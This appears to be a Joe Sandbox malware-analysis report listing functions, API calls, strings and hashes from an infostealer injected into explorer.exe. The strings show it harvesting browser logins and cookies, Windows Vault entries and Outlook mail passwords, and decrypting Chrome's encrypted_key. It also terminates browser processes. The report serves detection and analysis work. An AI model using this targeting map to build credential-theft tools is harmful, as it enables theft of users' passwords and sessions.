Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: wine_get_version
API String ID: 1646373207-2902792109
Opcode ID: 64f094e310f04052f5700c1f6bd54cdd92774b9cc2459a96bcb2dc19004332e9
Instruction ID: 93ce3e5ccc500f5898f8b455bdb9e25808faadd48cc3e8a818673ed253475f63
Opcode Fuzzy Hash: 64f094e310f04052f5700c1f6bd54cdd92774b9cc2459a96bcb2dc19004332e9
Instruction Fuzzy Hash: D411A721F0C68385FB599710F8B1BB53390AF9D704FC441B5D9ED822EADE2CE6468B00

Function 00007FFDFA96C590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

MoveFileExW.KERNEL32 ref: 00007FFDFA96C5C2
GetLastError.KERNEL32 ref: 00007FFDFA96C5CC

Strings

boost::filesystem::rename, xrefs: 00007FFDFA96C5D6

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorFileLastMove
String ID: boost::filesystem::rename
API String ID: 55378915-2110873845
Opcode ID: 8dca8874bfb7dd6f7dfd873a9110266fd1d7c776757e538c1c404bb48a2eebbb
Instruction ID: d96155a7e12fa1e15ace8f2b6b778d43ab0d9838050877cf3bb159a30dc8109c
Opcode Fuzzy Hash: 8dca8874bfb7dd6f7dfd873a9110266fd1d7c776757e538c1c404bb48a2eebbb
Instruction Fuzzy Hash: F0F0FF26B1CB4281EB088B16E86452A6760FF44FC4FA04075EAADC3BD8CF3CE5918344

Function 00007FFDFA8AAC80 Relevance: 5.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FFDFA8AAC9D
SetLastError.KERNEL32 ref: 00007FFDFA8AACB4
GetLastError.KERNEL32 ref: 00007FFDFA8AACFE
LocalFree.KERNEL32 ref: 00007FFDFA8AAD19

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$FreeLocal
String ID:
API String ID: 1627422176-0
Opcode ID: 0992fd39bbcecca185d899d48b70f7d57ffc834e00189db1b119eed07bf66011
Instruction ID: ea6e7ff16d54c0df8af96fa9c75037faf5f2670b112fa3188b7a622affeef822
Opcode Fuzzy Hash: 0992fd39bbcecca185d899d48b70f7d57ffc834e00189db1b119eed07bf66011
Instruction Fuzzy Hash: 9B112721F3C64355FB8CAB52A43087992509F45BC1F5400B4EDAE8FBDEDE6CE8428220

Function 00007FFDFA969310 Relevance: 5.1, APIs: 4, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFDFA969369
HeapFree.KERNEL32 ref: 00007FFDFA969378
GetProcessHeap.KERNEL32 ref: 00007FFDFA9693A3
HeapFree.KERNEL32 ref: 00007FFDFA9693B2

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2ee89589a5936ae31a689f7afc696f9c551bd5c68191e7446015a43d757db286
Instruction ID: 46f805e9341432f9400018be46e4e60b35bd7a61913ac7772ac12cb9e6b956f5
Opcode Fuzzy Hash: 2ee89589a5936ae31a689f7afc696f9c551bd5c68191e7446015a43d757db286
Instruction Fuzzy Hash: 05117236B0474182E7088B66D960929B361FF9ABB1B588235DB7E433E8DF7CD0418700

Function 00007FFDFA969860 Relevance: 5.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FFDFA8E352D), ref: 00007FFDFA9698AB
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FFDFA8E352D), ref: 00007FFDFA9698BA
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FFDFA8E352D), ref: 00007FFDFA9698E7
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00007FFDFA8E352D), ref: 00007FFDFA9698F6

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: b6a1841932a90bcf3e84ed0c1c01948b9f25d7b071fcb00ce4f8261a13364298
Instruction ID: ad663dc4656230b7b5fdb27c643ae38bcf1d8e21a6d6c33c3d4b2821a59e7ec1
Opcode Fuzzy Hash: b6a1841932a90bcf3e84ed0c1c01948b9f25d7b071fcb00ce4f8261a13364298
Instruction Fuzzy Hash: 76117725B0570282EB089B3594A05396761EF8BBB1B5C9675CB7D473E8DF2DD0458600

Analysis Process: explorer.exePID: 2580, Parent PID: 7664COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	54.2%
Signature Coverage:	7.8%
Total number of Nodes:	1096
Total number of Limit Nodes:	32

Executed Functions

Function 0B8D4B50 Relevance: 177.4, APIs: 16, Strings: 85, Instructions: 645
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0B8D4948: CreateToolhelp32Snapshot.KERNEL32 ref: 0B8D4969
Part of subcall function 0B8D4948: Process32First.KERNEL32 ref: 0B8D498C
Part of subcall function 0B8D4948: GetCurrentProcessId.KERNEL32 ref: 0B8D499A
Part of subcall function 0B8D4948: Process32Next.KERNEL32 ref: 0B8D4A58
Part of subcall function 0B8D4948: CloseHandle.KERNEL32 ref: 0B8D4A69

Part of subcall function 0B8D6E2C: GetProcessHeap.KERNEL32 ref: 0B8D6E30
Part of subcall function 0B8D6E2C: HeapAlloc.KERNEL32 ref: 0B8D6E42

Part of subcall function 0B8D8848: RegOpenKeyExA.ADVAPI32 ref: 0B8D887F
Part of subcall function 0B8D8848: CoInitialize.OLE32 ref: 0B8D8891
Part of subcall function 0B8D8848: CoCreateInstance.OLE32 ref: 0B8D88B4
Part of subcall function 0B8D8848: StrStrIW.SHLWAPI ref: 0B8D8933
Part of subcall function 0B8D8848: CoTaskMemFree.OLE32 ref: 0B8D8956
Part of subcall function 0B8D8848: CoTaskMemFree.OLE32 ref: 0B8D8965
Part of subcall function 0B8D8848: RegCloseKey.ADVAPI32 ref: 0B8D89A1

Part of subcall function 0B8D89E4: LoadLibraryA.KERNEL32 ref: 0B8D8A1B
Part of subcall function 0B8D89E4: GetProcAddress.KERNEL32 ref: 0B8D8A37
Part of subcall function 0B8D89E4: GetProcAddress.KERNEL32 ref: 0B8D8A4E
Part of subcall function 0B8D89E4: GetProcAddress.KERNEL32 ref: 0B8D8A65
Part of subcall function 0B8D89E4: GetProcAddress.KERNEL32 ref: 0B8D8A7C
Part of subcall function 0B8D89E4: GetProcAddress.KERNEL32 ref: 0B8D8A93
Part of subcall function 0B8D89E4: GetProcAddress.KERNEL32 ref: 0B8D8AB1

Part of subcall function 0B8D4A90: GetProcessHeap.KERNEL32 ref: 0B8D4AE0
Part of subcall function 0B8D4A90: HeapReAlloc.KERNEL32 ref: 0B8D4AFA

Part of subcall function 0B8D6F6C: GetProcessHeap.KERNEL32 ref: 0B8D6F87
Part of subcall function 0B8D6F6C: HeapFree.KERNEL32 ref: 0B8D6F95
Part of subcall function 0B8D6F6C: GetProcessHeap.KERNEL32 ref: 0B8D6FA0
Part of subcall function 0B8D6F6C: HeapFree.KERNEL32 ref: 0B8D6FAE

Part of subcall function 0B8D75F8: GetProcessHeap.KERNEL32 ref: 0B8D765D
Part of subcall function 0B8D75F8: HeapFree.KERNEL32 ref: 0B8D766B

Part of subcall function 0B8D7C00: SHGetFolderPathA.SHELL32 ref: 0B8D7C3B

Part of subcall function 0B8D4A90: HeapAlloc.KERNEL32 ref: 0B8D4B06

Part of subcall function 0B8D453C: lstrcpyA.KERNEL32 ref: 0B8D4564
Part of subcall function 0B8D453C: lstrcatA.KERNEL32 ref: 0B8D4575
Part of subcall function 0B8D453C: RegOpenKeyExA.ADVAPI32 ref: 0B8D4599

wsprintfA.USER32 ref: 0B8D53BF

Part of subcall function 0B8D453C: RegEnumKeyExA.ADVAPI32 ref: 0B8D45E0
Part of subcall function 0B8D453C: RegOpenKeyExA.ADVAPI32 ref: 0B8D4622
Part of subcall function 0B8D453C: lstrcpyW.KERNEL32 ref: 0B8D4650
Part of subcall function 0B8D453C: RegQueryValueExW.ADVAPI32 ref: 0B8D4686
Part of subcall function 0B8D453C: RegCloseKey.ADVAPI32 ref: 0B8D47A7
Part of subcall function 0B8D453C: RegEnumKeyExA.ADVAPI32 ref: 0B8D47DF
Part of subcall function 0B8D453C: RegCloseKey.ADVAPI32 ref: 0B8D47FA

SHGetFolderPathA.SHELL32 ref: 0B8D54F3
lstrcatA.KERNEL32 ref: 0B8D5508

Part of subcall function 0B8D5ABC: SHGetFolderPathA.SHELL32 ref: 0B8D5AF7

GetProcessHeap.KERNEL32 ref: 0B8D5690
HeapAlloc.KERNEL32 ref: 0B8D56A2
WideCharToMultiByte.KERNEL32 ref: 0B8D56D2
OpenFileMappingA.KERNEL32 ref: 0B8D56F3
MapViewOfFile.KERNEL32 ref: 0B8D5718
UnmapViewOfFile.KERNEL32 ref: 0B8D5724
CloseHandle.KERNEL32 ref: 0B8D572D
wprintf.LEGACY_STDIO_DEFINITIONS ref: 0B8D573D
wprintf.LEGACY_STDIO_DEFINITIONS ref: 0B8D574C
GetProcessHeap.KERNEL32 ref: 0B8D5756
HeapFree.KERNEL32 ref: 0B8D5764
GetProcessHeap.KERNEL32 ref: 0B8D576F
HeapFree.KERNEL32 ref: 0B8D577D

Strings

Chromium, xrefs: 0B8D4CE5
2IMAP Port, xrefs: 0B8D4F7E
Safer Technologies\Secure Browser, xrefs: 0B8D4DC5
Microsoft\Edge, xrefs: 0B8D4E3C
ff_pass, xrefs: 0B8D5211
2POP3 Port, xrefs: 0B8D4F62
\User Data\Default\Network\Cookies, xrefs: 0B8D4E2E
7Star\7Star, xrefs: 0B8D4D9B
2SMTP Port, xrefs: 0B8D4F70
1POP3 User Name, xrefs: 0B8D4E9E
CentBrowser, xrefs: 0B8D4D8D
1IMAP Password2, xrefs: 0B8D4F9A
1NNTP User Name, xrefs: 0B8D4EC8
3HTTPMail Password, xrefs: 0B8D4FFC
1HTTPMail User Name, xrefs: 0B8D4F38
%s, xrefs: 0B8D5736
RockMelt, xrefs: 0B8D4D01
ie_pass, xrefs: 0B8D528D
ff_cookie, xrefs: 0B8D54C8
360Browser\Browser, xrefs: 0B8D4D0F
Xpom, xrefs: 0B8D4C91
edge_pass, xrefs: 0B8D5305
Rafotech\Mustang, xrefs: 0B8D4DD3
Software\Microsoft\Office\%u.0\Outlook\Profiles, xrefs: 0B8D53B4
Orbitum, xrefs: 0B8D4CC9
Kometa, xrefs: 0B8D4D47
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 0B8D539B
1IMAP User Name, xrefs: 0B8D4EF2
\User Data\Default\Login Data, xrefs: 0B8D4E12
Suhba, xrefs: 0B8D4DB7
\Mozilla\Firefox\Profiles\, xrefs: 0B8D54FD
1HTTPMail Password2, xrefs: 0B8D4FB6
@, xrefs: 0B8D5701
3NNTP Password, xrefs: 0B8D4FEE
1HTTP Server URL, xrefs: 0B8D4F0E
Superbird, xrefs: 0B8D4DE1
%s, xrefs: 0B8D5745
Vivaldi, xrefs: 0B8D4D1D
1POP3 User, xrefs: 0B8D4F1C
00:39:18, xrefs: 0B8D5057
1SMTP Email Address, xrefs: 0B8D4E74
Torch, xrefs: 0B8D4DFD
1SMTP User Name, xrefs: 0B8D4EAC
Go!, xrefs: 0B8D4D2B
1HTTP User, xrefs: 0B8D4F00
1POP3 Password2, xrefs: 0B8D4F8C
outlook_pass, xrefs: 0B8D5383
build, xrefs: 0B8D50DB
1SMTP User, xrefs: 0B8D4F54
1HTTPMail Server, xrefs: 0B8D4F46
1IMAP User, xrefs: 0B8D4F2A
Sputnik\Sputnik, xrefs: 0B8D4D39
Google\Chrome SxS, xrefs: 0B8D4C83
3POP3 Password, xrefs: 0B8D4FD2
1SMTP Server, xrefs: 0B8D4E82
w~y&, xrefs: 0B8D4BBF
cr_pass, xrefs: 0B8D5193
Chedot, xrefs: 0B8D4DEF
12345, xrefs: 0B8D56E5
ie_cookie, xrefs: 0B8D5590
Comodo\Dragon, xrefs: 0B8D4CAD
3IMAP Password, xrefs: 0B8D4FE0
3SMTP Password, xrefs: 0B8D500A
Google\Chrome, xrefs: 0B8D4C75
1Email, xrefs: 0B8D4E66
uCozMedia\Uran, xrefs: 0B8D4D55
1SMTP Password2, xrefs: 0B8D4FC4
Epic Privacy Browser, xrefs: 0B8D4D71
cr_cookie, xrefs: 0B8D544A
cookies.sqlite, xrefs: 0B8D5527
Yandex\YandexBrowser, xrefs: 0B8D4C9F
1NNTP Password2, xrefs: 0B8D4FA8
1POP3 Server, xrefs: 0B8D4E90
edge_cookie, xrefs: 0B8D5600
Mar 29 2024, xrefs: 0B8D5094
Nichrome, xrefs: 0B8D4CF3
QIP Surf, xrefs: 0B8D4D63
Amigo, xrefs: 0B8D4CBB
1NNTP Server, xrefs: 0B8D4ED6
CocCoc\Browser, xrefs: 0B8D4D7F
1IMAP Server, xrefs: 0B8D4EE4
Elements Browser, xrefs: 0B8D4DA9
Bromium, xrefs: 0B8D4CD7
1NNTP Email Address, xrefs: 0B8D4EBA
\User Data\Default\Web Data, xrefs: 0B8D4E20

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: Heap$Process$Free$AddressProc$Close$AllocOpen$FileFolderPath$CreateEnumHandleProcess32TaskViewlstrcatlstrcpywprintf$ByteCharCurrentFirstInitializeInstanceLibraryLoadMappingMultiNextQuerySnapshotToolhelp32UnmapValueWidewsprintf
String ID: %s$%s$00:39:18$12345$1Email$1HTTP Server URL$1HTTP User$1HTTPMail Password2$1HTTPMail Server$1HTTPMail User Name$1IMAP Password2$1IMAP Server$1IMAP User$1IMAP User Name$1NNTP Email Address$1NNTP Password2$1NNTP Server$1NNTP User Name$1POP3 Password2$1POP3 Server$1POP3 User$1POP3 User Name$1SMTP Email Address$1SMTP Password2$1SMTP Server$1SMTP User$1SMTP User Name$2IMAP Port$2POP3 Port$2SMTP Port$360Browser\Browser$3HTTPMail Password$3IMAP Password$3NNTP Password$3POP3 Password$3SMTP Password$7Star\7Star$@$Amigo$Bromium$CentBrowser$Chedot$Chromium$CocCoc\Browser$Comodo\Dragon$Elements Browser$Epic Privacy Browser$Go!$Google\Chrome$Google\Chrome SxS$Kometa$Mar 29 2024$Microsoft\Edge$Nichrome$Orbitum$QIP Surf$Rafotech\Mustang$RockMelt$Safer Technologies\Secure Browser$Software\Microsoft\Office\%u.0\Outlook\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$Sputnik\Sputnik$Suhba$Superbird$Torch$Vivaldi$Xpom$Yandex\YandexBrowser$\Mozilla\Firefox\Profiles\$\User Data\Default\Login Data$\User Data\Default\Network\Cookies$\User Data\Default\Web Data$build$cookies.sqlite$cr_cookie$cr_pass$edge_cookie$edge_pass$ff_cookie$ff_pass$ie_cookie$ie_pass$outlook_pass$uCozMedia\Uran$w~y&
API String ID: 3620056986-83399204
Opcode ID: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
Instruction ID: 5184736f92216cc71304f67878a8f7b4e3e7dd59f1b5d162ae7b4a1a583f8d93
Opcode Fuzzy Hash: f8cb71ce208a17df0a9b5c5da18c7179ac2a3ecd80bdeebe11308395ec280a4b
Instruction Fuzzy Hash: 75622A79201B8699EB51EF29F8913D937A5FB46B84F94512BCA4D87734EF38C248C381

Function 0B8D89E4 Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 206
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 0B8D8A1B
GetProcAddress.KERNEL32 ref: 0B8D8A37
GetProcAddress.KERNEL32 ref: 0B8D8A4E
GetProcAddress.KERNEL32 ref: 0B8D8A65
GetProcAddress.KERNEL32 ref: 0B8D8A7C
GetProcAddress.KERNEL32 ref: 0B8D8A93
GetProcAddress.KERNEL32 ref: 0B8D8AB1
FreeLibrary.KERNEL32 ref: 0B8D8B02

Strings

vaultcli.dll, xrefs: 0B8D8A14
VaultOpenVault, xrefs: 0B8D8A3D
VaultFree, xrefs: 0B8D8A99
VaultGetItem, xrefs: 0B8D8A82
ie_vault, xrefs: 0B8D8C33
pass, xrefs: 0B8D8C3A
VaultCloseVault, xrefs: 0B8D8A54
VaultEnumerateItems, xrefs: 0B8D8A6B
VaultEnumerateVaults, xrefs: 0B8D8A2D

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: VaultCloseVault$VaultEnumerateItems$VaultEnumerateVaults$VaultFree$VaultGetItem$VaultOpenVault$ie_vault$pass$vaultcli.dll
API String ID: 2449869053-2044244656
Opcode ID: aec5936509b53667a6e6f178e038e2e7f35dddd7b55a4be1b787a5e39b0be16c
Instruction ID: ffe7d9ba8db4e5d59375ac0d44f20715e99fd11f4879d1f9b97fde9711780d04
Opcode Fuzzy Hash: aec5936509b53667a6e6f178e038e2e7f35dddd7b55a4be1b787a5e39b0be16c
Instruction Fuzzy Hash: AB914776B25B45CAEB10DF66E8503AD33A0FB4AB98F954526DE0993764EF38C449C340

Function 0B8D6604 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyA.KERNEL32 ref: 0B8D6633
lstrlenA.KERNEL32 ref: 0B8D663E
lstrcatA.KERNEL32 ref: 0B8D6662
lstrcatA.KERNEL32 ref: 0B8D6674
FindFirstFileA.KERNEL32 ref: 0B8D6683
lstrcpyA.KERNEL32 ref: 0B8D66D2
lstrcatA.KERNEL32 ref: 0B8D66E8
lstrcatA.KERNEL32 ref: 0B8D66F7
lstrcatA.KERNEL32 ref: 0B8D6709
StrStrIA.SHLWAPI ref: 0B8D6791
lstrcpyA.KERNEL32 ref: 0B8D67A8
lstrcatA.KERNEL32 ref: 0B8D67BE
lstrcatA.KERNEL32 ref: 0B8D67CD
FindNextFileA.KERNEL32 ref: 0B8D680B
FindClose.KERNEL32 ref: 0B8D681C

Strings

*.*, xrefs: 0B8D6668
\, xrefs: 0B8D6649

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: lstrcat$Findlstrcpy$File$CloseFirstNextlstrlen
String ID: *.*$\
API String ID: 2453054391-2874222586
Opcode ID: 5a99298ae7c46de716506d94cc817f34561c862b1145259e25b225ece9022be3
Instruction ID: f5835d2090d757bff08121d712d39a5d1b4e8337449fcf8067cc6ed2f328370c
Opcode Fuzzy Hash: 5a99298ae7c46de716506d94cc817f34561c862b1145259e25b225ece9022be3
Instruction Fuzzy Hash: 20518232354A89D6EF60CF24E8547D973B0F756B89F549112EB4D87A68EF38C949C700

Function 0B969708 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 366
timeCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 0B969746

Part of subcall function 0B968E8C: _invalid_parameter_noinfo.LIBCMT ref: 0B968EA0

_get_daylight.LIBCMT ref: 0B969735

Part of subcall function 0B968EEC: _invalid_parameter_noinfo.LIBCMT ref: 0B968F00

_get_daylight.LIBCMT ref: 0B96997B
_get_daylight.LIBCMT ref: 0B96998C
_get_daylight.LIBCMT ref: 0B96999D
GetTimeZoneInformation.KERNEL32 ref: 0B9699C4
WideCharToMultiByte.KERNEL32 ref: 0B969A5A
WideCharToMultiByte.KERNEL32 ref: 0B969AA6

Strings

Eastern Standard Time, xrefs: 0B969A2E
:, xrefs: 0B969866
?, xrefs: 0B969A99
Eastern Summer Time, xrefs: 0B969A85
-, xrefs: 0B96980B
:, xrefs: 0B96983C

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
String ID: -$:$:$?$Eastern Standard Time$Eastern Summer Time
API String ID: 3440502458-2354618740
Opcode ID: cbfc0f5ff51ac8a7906312dfaf2d67d83576dee486a354c7ff1febf89045c9fb
Instruction ID: e3dee305e2a65074be2d239056c339fc1c0df63c073fb0e3b86b70cf7f2d9721
Opcode Fuzzy Hash: cbfc0f5ff51ac8a7906312dfaf2d67d83576dee486a354c7ff1febf89045c9fb
Instruction Fuzzy Hash: 8CD135326007908EEB65DF35E95175A3BA9F7C9BD8F88512AEF4A47B18DB38C442C700

Function 0B8D4948 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0B8D4969
Process32First.KERNEL32 ref: 0B8D498C
GetCurrentProcessId.KERNEL32 ref: 0B8D499A
OpenProcess.KERNEL32 ref: 0B8D49C9
StrStrIA.SHLWAPI ref: 0B8D49E3
StrStrIA.SHLWAPI ref: 0B8D4A00
StrStrIA.SHLWAPI ref: 0B8D4A1E
TerminateProcess.KERNEL32 ref: 0B8D4A41
CloseHandle.KERNEL32 ref: 0B8D4A4A
Process32Next.KERNEL32 ref: 0B8D4A58
CloseHandle.KERNEL32 ref: 0B8D4A69

Strings

chrome.exe, xrefs: 0B8D49D7
iexplore.exe, xrefs: 0B8D49F1
msedge.exe, xrefs: 0B8D4A0E

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: Process$CloseHandleProcess32$CreateCurrentFirstNextOpenSnapshotTerminateToolhelp32
String ID: chrome.exe$iexplore.exe$msedge.exe
API String ID: 477742948-2002101784
Opcode ID: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
Instruction ID: 19ddd0e8bbedf344bf104b1cad9ced1a4ec3d02ec07f5c6c24accab0b9359d41
Opcode Fuzzy Hash: fe7781aa355af09044517de538f76c2667a12ca60234848eb8ea9a4026d88ee0
Instruction Fuzzy Hash: 3331B131328B0581EF14CB22E94475937A1FBD5B94F594212DB6E837B8DF39C54AC744

Function 0B8D5E5C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 109
memoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0B8D6500: CreateFileA.KERNEL32 ref: 0B8D653B

StrStrIA.SHLWAPI ref: 0B8D5E9D
StrChrA.SHLWAPI ref: 0B8D5EBB
CryptUnprotectData.CRYPT32 ref: 0B8D5F2E
GetProcessHeap.KERNEL32 ref: 0B8D5F38
HeapAlloc.KERNEL32 ref: 0B8D5F4A
GetProcessHeap.KERNEL32 ref: 0B8D5F6A
HeapAlloc.KERNEL32 ref: 0B8D5F7C
LocalFree.KERNEL32 ref: 0B8D5FAF
GetProcessHeap.KERNEL32 ref: 0B8D5FB5
HeapFree.KERNEL32 ref: 0B8D5FC4

Strings

"encrypted_key":", xrefs: 0B8D5E96

Memory Dump Source

Source File: 00000009.00000002.4136914090.000000000B8D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0B8D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_b8d0000_explorer.jbxd

Similarity

API ID: Heap$Process$AllocFree$CreateCryptDataFileLocalUnprotect
String ID: "encrypted_key":"
API String ID: 3383461352-877455259
